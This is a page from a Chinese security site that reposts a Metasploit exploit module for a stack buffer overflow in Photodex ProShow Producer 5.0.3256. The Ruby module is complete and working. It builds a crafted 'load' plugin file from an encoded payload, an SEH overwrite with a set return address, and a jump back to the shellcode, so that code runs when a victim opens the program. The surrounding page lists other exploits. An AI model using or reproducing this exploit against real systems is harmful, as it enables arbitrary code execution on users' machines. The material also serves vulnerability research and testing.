首页 | 安全文章 | 安全工具 | Exploits | 本站原创 | 关于我们 | 网站地图 | 安全论坛
  当前位置:主页>安全文章>文章资料>Exploits>文章内容
Photodex ProShow Producer 5.0.3256 Buffer Overflow
来源:http://www.metasploit.com 作者:juan 发布时间:2012-07-27  
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# web site for more information on licensing and terms of use.
#   http://metasploit.com/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::FILEFORMAT
	include Msf::Exploit::Remote::Seh
	include Msf::Auxiliary::Report

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'Photodex ProShow Producer 5.0.3256 load File Handling Buffer Overflow',
			'Description'    => %q{
					This module exploits a stack-based buffer overflow in Photodex ProShow Producer
				v5.0.3256 in the handling of the plugins load list file. An attacker must send the
				crafted "load" file to victim, who must store it in the installation directory. The
				vulnerability will be triggered the next time ProShow is opened. The module has been
				tested successfully on Windows XP SP3 and Windows 7 SP1.
			},
			'License'        => MSF_LICENSE,
			'Author'         => [
				'Julien Ahrens', # Vulnerability discovery and PoC
				'mr.pr0n', # Additional PoC
				'juan', # Metasploit module
			],
			'References'     =>
				[
					[ 'OSVDB', '83745' ],
					[ 'EDB', '19563' ],
					[ 'EDB', '20036' ],
					[ 'URL', 'http://security.inshell.net/advisory/30' ]
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'process',
				},
			'Payload'        =>
				{
					'Space'    => 9844,
					'BadChars' => "\x00\x0a\x0d",
					'StackAdjustment' => -3500,
				},
			'Platform' => 'win',
			'Targets'        =>
				[
					[
						'Photodex ProShow Producer 5.0.3256 / Windows XP SP3 / Windows 7 SP1',
						{
							'Offset' => 9844,
							'Ret' => 0x1022A959 # p/p/r from if.dnt
						}
					],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jun 06 2012',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptString.new('FILENAME', [ true, 'The file name.',  'load']),
			], self.class)
	end

	# Overriding file_create to allow the creation of a file without extension
	def file_create(data)

		fname = datastore['FILENAME']
		ltype = "exploit.fileformat.#{self.shortname}"

		if ! ::File.directory?(Msf::Config.local_directory)
			FileUtils.mkdir_p(Msf::Config.local_directory)
		end

		path = File.join(Msf::Config.local_directory, fname)
		full_path = ::File.expand_path(path)
		File.open(full_path, "wb") { |fd| fd.write(data) }

		report_note(:data => full_path.dup, :type => "#{ltype}.localpath")

		print_good "#{fname} stored at #{full_path}"

	end

	def exploit

		sploit = payload.encoded
		sploit << generate_seh_record(target.ret)
		# jmp back to the payload
		sploit << Metasm::Shellcode.assemble(Metasm::Ia32.new, "jmp $-#{target['Offset']+8}").encode_string
		# cause exception hitting the end of the stack
		sploit << rand_text(300)

		print_status("Creating '#{datastore['FILENAME']}' file ...")
		file_create(sploit)

	end

end

 
[推荐] [评论(0条)] [返回顶部] [打印本页] [关闭窗口]  
匿名评论
评论内容:(不能超过250字,需审核后才会公布,请自觉遵守互联网相关政策法规。
 §最新评论:
  热点文章
·CVE-2012-0217 Intel sysret exp
·Linux Kernel 2.6.32 Local Root
·Array Networks vxAG / xAPV Pri
·Novell NetIQ Privileged User M
·Array Networks vAPV / vxAG Cod
·Excel SLYK Format Parsing Buff
·PhpInclude.Worm - PHP Scripts
·Apache 2.2.0 - 2.2.11 Remote e
·VideoScript 3.0 <= 4.0.1.50 Of
·Yahoo! Messenger Webcam 8.1 Ac
·Family Connections <= 1.8.2 Re
·Joomla Component EasyBook 1.1
  相关文章
·Linux x86 chmod 666 /etc/passw
·BarcodeWiz.dll remote Buffer O
·Linux x86 execve("/bin/sh") -
·linux/x86 - ASLR deactivation
·Symantec Web Gateway 5.0.3.18
·CuteFlow 2.11.2 Arbitrary File
·Zabbix 2.0.1 and Earlier Sessi
·Cisco Linksys PlayerPT ActiveX
·Symantec Web Gateway 5.0.2.18
·Symantec Web Gateway 5.0.3.18
·Mini-stream RM-MP3 Converter 3
·AlienVault OSSIM 3.1 Reflected
  推荐广告
CopyRight © 2002-2022 VFocuS.Net All Rights Reserved